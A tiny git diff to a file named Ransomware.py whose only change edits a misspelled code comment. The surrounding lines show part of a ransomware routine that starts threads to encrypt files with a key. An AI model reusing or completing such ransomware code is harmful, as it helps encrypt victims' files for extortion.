diff --git a/Ransomware.py b/Ransomware.py index c3fe4bd..6ce67c9 100644 --- a/Ransomware.py +++ b/Ransomware.py @@ -124,7 +124,7 @@ def CallErrorBox(): # Making Simple Error Box in Tk if len(threading.enumerate()) < MaxThread: # IF your Worker List is Free EncrypterObj = D_E_ncrypt(FilePath, Box) # Pass in file name And key - threading.Thread(target=EncrypterObj.FileE, args=()).start() # to Encypte. + threading.Thread(target=EncrypterObj.FileE, args=()).start() # to Encypt. break # Break Out